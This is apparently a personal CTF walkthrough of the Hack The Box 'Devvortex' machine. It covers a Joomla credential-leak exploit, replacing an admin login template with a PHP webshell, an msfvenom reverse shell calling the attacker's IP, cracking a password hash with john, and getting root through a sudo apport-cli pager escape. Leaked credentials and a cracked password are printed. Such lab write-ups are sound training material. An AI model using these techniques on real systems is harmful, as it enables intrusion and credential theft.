HTB Devvortex - Easy Linux Machine
It's been a little while since I've last done a CTF, so I decided to jump on HTB and see what kind of machines they had. I picked an easy machine so I wouldn't be on all night obsessing. HTB boxes are generally more realistic/difficult than sites like tryhackme and offsec's proving grounds, at least in my experience.
So, as soon as I was able to get an IP for the target, I began with an nmap scan of all ports on the machine
nmap -p- 10.10.11.242
# Nmap 7.93 scan initiated Fri Dec 29 20:34:04 2023 as: nmap -p- -o nmap.txt 10.10.11.242
Nmap scan report for 10.10.11.242
Host is up (0.033s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
# Nmap done at Fri Dec 29 20:38:22 2023 -- 1 IP address (1 host up) scanned in 258.06 secondsI saw that only ports 22 and 80 were open, so I did some further enumerating on those ports to see what specific services were running.
nmap -sV -sC -p 22,80 10.10.11.242There wasn't really much from the return, only that port 80 was redirecting to "http://devvortex.htb". So I opened up the /etc/hosts file and added in the ip along with the domain name.
sudo nano /etc/hosts
I then visited the domain via URL and was met with a very basic, unconfigured website.
I browsed the site a bit to realize there wasn't anything of value. I also ran a nikto scan and dirbuster scan with no luck. I then started to think about the possibility of a subdomain, so I ran a subdomain fuzz scan with ffuf.
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://devvortex.htb -H "Host:FUZZ.devvortex.htb" -fs 154I ran this same command without the -fs 154 at the end and was getting hits for almost everything. I had to add on to exclude the filesize of anything found that was equal to 154. Almost immediately I found a subdomain for dev.
I went back to the /etc/hosts file and updated it to reflect the subdomain.
After that I was able to access the dev subdomain's web server, which again looked very generic and not configured.
I ran a dirbuster scan using the small list and found there was an administrator panel.
Once I saw this, I realized it was using Joomla. I had used this scanner for it in a previous CTF that I had done, so I ran joomscan to see what version it was so that I could leverage that information to find a potential exploit or default login credentials.
joomscan -u http://dev.devvortex.htb
I was able to discover that it was version 4.4.6, so I googled "joomla 4.2.6 exploit" and found one on exploit-db.
http://www.exploit-db.com/exploits/51334
I copied the code and put it into a file named joom.rb. I then ran the exploit.
ruby joom.rb http://dev.devvortex.htb
The exploit worked and gave me a username and password, which I was going to try within the admin login panel.
lewis:P4ntherg0t1n5r3c0n##I was able to login with those credentials. I looked around and came across a place where I could insert php code into a template that I could access from the browser.
I clicked on "System"
Then I clicked on "Administrator Templates".
Then I clicked on the "Atum Details and Files" link.
From there I clicked on "login.php". Now, in hindsight, I probably should have done something a bit different here, such as adding a small php webshell to the provided code and accessing the RCE through the URL in the browser. Instead what I did here completely erases the login page, so anytime the user "lewis" logs in to the administrator panel, that user is going to be met with a pretty sweet php webshell that he can't edit or alter lol. So I copied the php code from White Winter Wolf b/c I love using it, and put it into the code section, erasing all previous code from it. As soon as I clicked "Save", it gave me a webshell.
I went to the /tmp directory and then checked to see what user I was. I knew I was going to want to upload a reverse shell immediately, so I created one using msfvenom.
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.4 LPORT=4444 -f elf > shell.elfI then set up a netcat listener on my kali machine.
nc -nvlp 4444Then I used the upload feature on the webshell to upload the reverse shell, "shell.elf". Once it was uploaded to the /tmp directory, I made it executable and then ran it.
chmod +x shell.elf
./shell.elf
I now had an interactive shell. I ran a command to get a better shell, and then tried to connect to mysql using the credentials I previously had in hopes that there were more passwords within that database. I was able to connect and listed the databases.
I saw a database named "joomla" and decided to use it. I then listed all the tables. There were a lot of tables, but I noticed one for users, which should contain password hashes if there are more users.
There was a password has for the user "logan"! So I grabbed that hash and ran it through john.
echo '$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12' > paul.txt
john --wordlist=/usr/share/wordlists/rockyou.txt paul.txt
A few seconds later I had the password for "logan". I exited out of mysql and went back to the interactive shell with the www-data user and tried to login as logan.
su logan
tequieromucho
Success! I was now logged in as logan. I looked for a flag at the user's home directory and was able to get the user.txt flag. Next, generally in all priv esc I do, I do this first... I checked to see what sudo privs this user had.
sudo -l 
I saw that logan was able to run sudo with the apport-cli binary. I had to do a ton of Googling to find what this even was and how to abuse it. Essentially, when a program crashes, Apport automatically collects data about the crash and saves it in a report. apport-cli can be used to manually generate these reports. Ok cool, but how tf do I abuse this bad boy to get root??? Thanks to bdrung for showing the PoC for this because I was pretty lost until I came across this.
http://github.com/canonical/apport/commit/e5f78cc89f1f5888b6a56b785dddcb0364c48ecb
I just followed his proof of concept and was easily able to obtain root user.
$ sudo apport-cli -c /var/crash/xxx.crash less
[...]
Please choose (S/E/V/K/I/C): v
!id
uid=0(root) gid=0(root) groups=0(root)
!done (press RETURN)
Overall this box was slightly easy. It would have been a medium to hard difficulty with the offsec boxes I think. I learned quite a bit during the priv esc phase of this box though. Hopefully I can do more of these in the near future after taking these SANS courses. Hope you enjoyed.
-Sam
